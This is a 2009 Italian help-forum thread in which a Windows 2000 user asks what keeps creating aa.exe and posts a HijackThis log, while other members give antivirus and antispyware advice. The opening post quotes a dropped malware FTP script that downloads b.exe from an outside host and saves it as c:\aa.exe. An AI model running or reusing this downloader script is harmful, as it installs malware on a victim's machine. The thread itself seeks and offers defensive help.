Benvenuto Ospite Cerca | Topic Attivi | Utenti | | Log In | Registra

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » AA.exe

AA.exe Opzioni
Topic Precedente · Topic Sucessivo
alfredot
Inviato: Wednesday, December 23, 2009 2:02:17 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Buongiorno.

Uso Win 2000 + SP4 e Mozilla come browser predefinito.
Da un po' di tempo compare aa.exe e, spesso ma non sempre, accompagnato da altri file: a.bat, ff.bat e gz.

L'unico che riesco a leggere è gz:

Commenta:
open f1tp.3322.org
f1t
f1t
binary
get b.exe c:\aa.exe
bye


f1tp.3322.org è rintracciabile solo nel registro di sistema in:
HKCU/Software/Microsoft/Internet Explorer/Explorer Bar/{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}/FileNamedMRU/

Altri malfunzionamenti che non se legati alla presenza di aa.exe sono:
- l'impossibilità di settare in Mozilla Opzioni/Privacy in Impostazioni personalizzate
- l'impossibilità di eseguire SpeedyFox (scaricato più volte da siti diversi)

Prima avevo problemi anche con Ccleaner che non eliminava i cookies e negli accessi ai forum non teneva le impostazioni, costringendomi a fare il login ogni volta.

Ho riformattato e reinstallato ma l'unica cosa che si è risolta è stato eliminare questi due ultimi inconvenienti.

Ho provato a cancellare prefs.js, ma non è servito a niente.
Prima caricavo il profilo da MozBackup. L'ultima volta ho aperto il file zippato e non ho inserito "Cookies"

Si può capire che cosa generi aa.exe?

Grazie
Torna in alto
 
Sponsor
Inviato: Wednesday, December 23, 2009 2:02:17 PM

 
Torna in alto
 
pidue
Inviato: Wednesday, December 23, 2009 2:33:04 PM

Rank: AiutAmico

Iscritto dal : 6/2/2005
Posts: 7,332
Posta un log di HijackThis.
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 2:33:51 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Posta -per cominciare- un bel LOG di HijackThis (scaricabile da Aiutamici), perché sennò, mi sa che qui non se ne viene a capo...
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 2:43:16 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Aye aye, Sir!

Commenta:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 14.42.28, on 23/12/2009
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\LEXBCES.EXE
C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\LEXPPS.EXE
C:\Programmi\AVG\AVG9\avgwdsvc.exe
C:\Programmi\Executive Software\DiskeeperLite\DKService.exe
C:\WINNT\System32\svchost.exe
C:\Programmi\Java\jre6\bin\jqs.exe
C:\Programmi\RVS\WCOM\SYSTEM\RVSINST.EXE
C:\WINNT\system32\MSTask.exe
C:\Programmi\AVG\AVG9\avgchsvx.exe
C:\Programmi\AVG\AVG9\avgrsx.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\Programmi\File comuni\Softwin\BitDefender Communicator\xcommsvr.exe
C:\Programmi\AVG\AVG9\avgemc.exe
C:\Programmi\AVG\AVG9\avgcsrvx.exe
C:\Programmi\File comuni\Softwin\BitDefender Update Service\livesrv.exe
C:\Programmi\AVG\AVG9\avgcsrvx.exe
C:\Programmi\AVG\AVG9\avgnsx.exe
C:\WINNT\Explorer.EXE
C:\Programmi\BillP Studios\WinPatrol\winpatrol.exe
C:\PROGRA~1\AVG\AVG9\avgtray.exe
C:\PROGRA~1\Softwin\BITDEF~1\bdmcon.exe
C:\Programmi\Softwin\BitDefender10\bdagent.exe
C:\Programmi\Java\jre6\bin\jusched.exe
C:\Programmi\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\Toolbox\StatusClient\StatusClient.exe
C:\WINNT\system32\internat.exe
C:\Programmi\Hewlett-Packard\Toolbox2.0\Javasoft\JRE\1.3.1\bin\javaw.exe
C:\Programmi\ATnotes\ATnotes.exe
C:\Programmi\Spybot - Search & Destroy\TeaTimer.exe
C:\Programmi\Compare & Backup\Everyday Auto Backup\AutoBackup.exe
C:\Programmi\StopDialers\StopDialer.exe
C:\Programmi\Outlook Express\msimn.exe
C:\Programmi\Mozilla Firefox\firefox.exe
C:\Programmi\File comuni\Softwin\BitDefender Update Service\upgrepl.exe
C:\Programmi\Trend Micro\HijackThis\HijackThis.exe
C:\Programmi\File comuni\Softwin\BitDefender Scan Server\bdss.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://it.msn.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Programmi\AVG\AVG9\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programmi\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programmi\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O4 - HKLM\..\Run: [WinPatrol] C:\Programmi\BillP Studios\WinPatrol\winpatrol.exe -expressboot
O4 - HKLM\..\Run: [AVG9_TRAY] C:\PROGRA~1\AVG\AVG9\avgtray.exe
O4 - HKLM\..\Run: [BDMCon] C:\PROGRA~1\Softwin\BITDEF~1\bdmcon.exe
O4 - HKLM\..\Run: [BDAgent] "C:\Programmi\Softwin\BitDefender10\bdagent.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [StatusClient] C:\Programmi\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\Toolbox\StatusClient\StatusClient.exe /auto
O4 - HKLM\..\Run: [TomcatStartup] C:\Programmi\Hewlett-Packard\Toolbox2.0\hpbpsttp.exe
O4 - HKLM\..\Run: [Launch Ai Booster] "C:\Programmi\ASUS\Ai Booster\OverClk.exe"
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKCU\..\Run: [internat.exe] internat.exe
O4 - HKCU\..\Run: [ATnotes.exe] C:\Programmi\ATnotes\ATnotes.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Programmi\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Everyday Auto Backup] C:\Programmi\Compare & Backup\Everyday Auto Backup\AutoBackup.exe /1
O4 - HKUS\.DEFAULT\..\Run: [internat.exe] internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Programmi\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O4 - .DEFAULT Startup: Stop Dialers.lnk = C:\Programmi\StopDialers\StopDialer.exe (User 'Default user')
O4 - Startup: Stop Dialers.lnk = C:\Programmi\StopDialers\StopDialer.exe
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1260460266859
O17 - HKLM\System\CCS\Services\Tcpip\..\{649D0D17-1010-480D-8A8A-97A54D10BE5A}: NameServer = 62.211.69.150 212.48.4.15
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Programmi\AVG\AVG9\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINNT\SYSTEM32\avgrsstx.dll
O23 - Service: AVG Free E-mail Scanner (avg9emc) - AVG Technologies CZ, s.r.o. - C:\Programmi\AVG\AVG9\avgemc.exe
O23 - Service: AVG Free WatchDog (avg9wd) - AVG Technologies CZ, s.r.o. - C:\Programmi\AVG\AVG9\avgwdsvc.exe
O23 - Service: BitDefender Scan Server (bdss) - Unknown owner - C:\Programmi\File comuni\Softwin\BitDefender Scan Server\bdss.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Programmi\Executive Software\DiskeeperLite\DKService.exe
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Programmi\Java\jre6\bin\jqs.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINNT\system32\LEXBCES.EXE
O23 - Service: BitDefender Desktop Update Service (LIVESRV) - SOFTWIN S.R.L. - C:\Programmi\File comuni\Softwin\BitDefender Update Service\livesrv.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINNT\system32\HPZipm12.exe
O23 - Service: RVS Installer (RVSINST) - RVS Datentechnik GmbH, München - C:\Programmi\RVS\WCOM\SYSTEM\RVSINST.EXE
O23 - Service: BitDefender Virus Shield (VSSERV) - SOFTWIN S.R.L. - C:\Programmi\Softwin\BitDefender10\vsserv.exe
O23 - Service: BitDefender Communicator (XCOMM) - SOFTWIN S.R.L - C:\Programmi\File comuni\Softwin\BitDefender Communicator\xcommsvr.exe

--
End of file - 6632 bytes


Grazie
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 2:51:11 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Perdona la domanda, ma hai DUE antivirus? Eh?
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 3:06:00 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Ne ho 3
AVG che, per mia esperienza, ne becca pochissimi nello scanning ma trova quelli in entrata (anche spuBot è piuttosto efficiente)
E Bitdefender e Malwarebytes che mi consta non confliggano, ma servono solo per fare lo scanning.
AVG non ha beccato quasi mai nulla di quanto era passato!
Torna in alto
 
paolopa
Inviato: Wednesday, December 23, 2009 3:11:31 PM

Rank: AiutAmico

Iscritto dal : 10/14/2008
Posts: 2,777
dovresti anche eliminare il teatimer di spybot,e la cosa migliore sarebbe disinstallarlo completamente e nel reinstallarlo togliere la spunta al teatimer.
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 3:14:00 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Malwarebytres' AntiMalware è un antispyware, NON un antivirus.
Ma AVG e BitDefender sono entrambi antivirus e -se entrano in conflitto fra di loro- è naturale che non riescano a beccar più nessun viris: stan troppo impegnati scambiarsi allegramente sganassoni per occuparsi di noiose quisquiglie come i virus!
Per cui la domanda è: quale versione di BitDefender hai installato, esattamente?
C'era, un tempo, una versione che NON forniva nessuna "protezione reale", ma non so se ci sia ormai più...
Altrimenti, NON si può avere, sul computer più di un UNICO antivirus "residente": disinstalla, dunque, uno dei tuoi 2 antivirus residenti (l'uno o l'altro, fa poca differenza).
In quanto ad AVG, non è che sia poi male, anzi: io lo uso da vari anni (intendo, la versione FREE) e non mi ha mai tradito.
Ma pure questo, forse, è "gusto personale" e ognuno può apprezzare quel che vuole.


PS: leggo ora il giusto rilevo di Paolo. Ha ragione! Il TeaTimer sarebbe molto meglio non averlo (anche se Spybot resta comunque un valido baluardo).
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 3:25:14 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
BitDefender v10 Build 247
Commenta:

C'era, un tempo, una versione che NON forniva nessuna "protezione reale"

Esatto! Questo intendevo! :)
Disinstallare? Ma questo BitDefender non offre protezione in tempo reale!
E, in questo modo non interferisce con AVG!
Me ne ha beccati parecchi, fino a oggi!
+++++++++++++++++++++++++++++++++++++++++++++
Non avevo visto il post di Paolo e mi scuso!

Che danni può creare TeaTimer? Mi ha beccato diversa roba che era entrata....
Però, se creasse problemi, potrei certamente disinstallarlo
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 3:30:05 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Il TeaTimer non è gran che efficace e, inoltre, impedisce di isntallare e usare un antispyware "residente" (perché ci andrebbe in conflitto).
Se hai la versione di BitDefender che NON offre "protezione residente", allora NON SERVE CHE TU LA DISINSTALLI.
Non pensavo che ci fosse ancora, scusa tanto...
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 3:45:10 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Commenta:
Il TeaTimer non è gran che efficace e, inoltre, impedisce di isntallare e usare un antispyware "residente" (perché ci andrebbe in conflitto).


Ah... Non lo sapevo. Io ho un antispyware "residente"??
Prima di disinstallarlo, se provassi a disattivarlo? Dato che ho un dialup e non l'ADSL ci metto una vita a scaricare gli aggiornamento

Tu ti scusi con... me? :)))
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 4:23:29 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Mi scuso (doverosamente) perché -avendo immaginato che il tuo BitDefender fosse "residente"- t'ho allarmato a vuoto, senza che ce ne fosse davvero ragione.
In quanto al TeaTimer, la sola via sicura è disinstallare Spybot, poi RIAVVIARE il computer e, al riavvio, reinstallare Spybot. Questa volta, però, durante le varie schermate di installazione, bisogna far molta attenzione a togliere la "spunta" che appare accanto alla voce "Protezione di sistema (Tea Timer)".
Riguardo all'antispyware "residente", una volta eliminato il teaTimer, mi par tu non ne abbia.
Se ne vuoi uno valido, ti suggerisco WinPatrol2010 (la versione free).
Il programma, di per sé, è in lingua inglese, ma è possibile "tradurlo" in italiano facilmente.
Il programma si scarica da QUI (su Aiutamici, questo software non è presente). Devi scaricare il file WinPatrol2010 (non gli altri due!)...
Ma non installarlo subito, perché è in lingua inglese.
Prima, scarica anche il file (che trovi scendendo verso il fondo della pagina) WinPatrol Italian Setup (si tratta di una vecchia versione di WinPatrol, che ha il vantaggio di essere in lingua italiana).
A questo punto, procedi ad installare il WinPatrol italiano che hai appena scaricato.
Dopo aver finito l'installazione, procedi ad aggiornare all'ultima versione, semplicemente installando il WinPatrol2010 in inglese.
Alla fine dei giochi, ti troverai WinPatrol2010 in lingua italiana.
Questo programma NON ha nessun bisogno di fare aggiornamenti (è interamente euristico, dunque non gli serve aggiornare alcun database [visto che non ne ha]). Una sola avvertenza: ogni qualvolta userai l' "Immunizzazione" di Spybot, WinPatrol ti chiederà se deve acconsentire (non te lo chiederà subito, ma quando accederai in qualsivoglia modo ad Internet): in questi casi (specifici e ben chiari [perché lo sai per certo che hai "immunizzato"!]) rispondi sempre che acconsenti.
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 4:48:28 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Commenta:
Mi scuso

Ma daaaai! :)) Almeno ho capito che cosa significhi "residente".
E poi... io vivo allarmato!

Re.: SpyBot
Lo farò al più presto!
Scusa la domanda monsee. Ma SpyBot senza TeaTimer serve solo se lo faccio andare per vedere se ci sia qualcosa, vero? Visto che non mi intercetterà quelli in entrata.

Re.:WinPatrol
Mi spiace... non lo consideravo un antispyware! In effetti avverte se qualcosa vuole installarsi... Sono molto tonto. Scusami
Ho WinPatrol 2010 (io non capisco un acca di PC, l'inglese non è un problema)

Ma, a parte tutto questo... aa.exe che cosa lo fa spuntare fuori?
Non c'è un posto dove andare a vedere, un programma sorgente che si possa controllare?
Torna in alto
 
paolopa
Inviato: Wednesday, December 23, 2009 4:57:36 PM

Rank: AiutAmico

Iscritto dal : 10/14/2008
Posts: 2,777
spybot serve,oltre che per fare scansioni ed eliminare cio' che trova,per immunizzare il pc.ha un database che dovresti aggiornare una volta alla settimana,dopodichè,con la funzione immunizza,previeni l installazione degli agenti presenti nel database.
Torna in alto
 
monsee
Inviato: Wednesday, December 23, 2009 5:44:12 PM
Rank: AiutAmico

Iscritto dal : 4/5/2005
Posts: 22,971
Magari c'è un modo svelto e sicuro per individuare questo AA.exe e farlo fuori, ma -per adesso- non risulta noto (o, almeno, io non lo conosco).
Sicché tocca tentare varie procedure: l'ho già detto, la guerra è guerra, una faccenda dura e poco interessante, e quella ai virus lo è ancora di più...
Torna in alto
 
alfredot
Inviato: Wednesday, December 23, 2009 6:13:12 PM

Rank: AiutAmico

Iscritto dal : 12/22/2009
Posts: 697
Re.: paolopa
Grazie. :) Visto che "sai"... che cosa è l'immunizzazione? Io lo aggiorno più frequentemente di 1 volta/settimana ed immunizzo regolarmente a browser chiuso, ma non so che cosa io stia facendo!

Re.: monsee
Commenta:
non risulta noto

Io speravo... :)
Allora SpyBot è reinstallato, aggiornato e sta scannerizzando.
Durante l'installazione, in advanced mode, ho sflaggato il TeaTimer.

Che faccio adesso per condurre vittoriosamente la guerra? :)
Torna in alto
 
paolopa
Inviato: Wednesday, December 23, 2009 6:32:59 PM

Rank: AiutAmico

Iscritto dal : 10/14/2008
Posts: 2,777
io non sono un esperto,per cui ti dico cio che farei io sul mio pc,poi vedi tu...
http://www.norman.com/support/support_tools/58732/it
Torna in alto
 
Utenti presenti in questo topic
Guest

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » AA.exe


Salta al Forum
Aggiunta nuovi Topic disabilitata in questo forum.
Risposte disabilitate in questo forum.
Eliminazione tuoi Post disabilitata in questo forum.
Modifica dei tuoi post disabilitata in questo forum.
Creazione Sondaggi disabilitata in questo forum.
Voto ai sondaggi disabilitato in questo forum.

Main Forum RSS : RSS

Aiutamici Theme
Powered by Yet Another Forum.net versione 1.9.1.8 (NET v2.0) - 3/29/2008
Copyright © 2003-2008 Yet Another Forum.net. All rights reserved.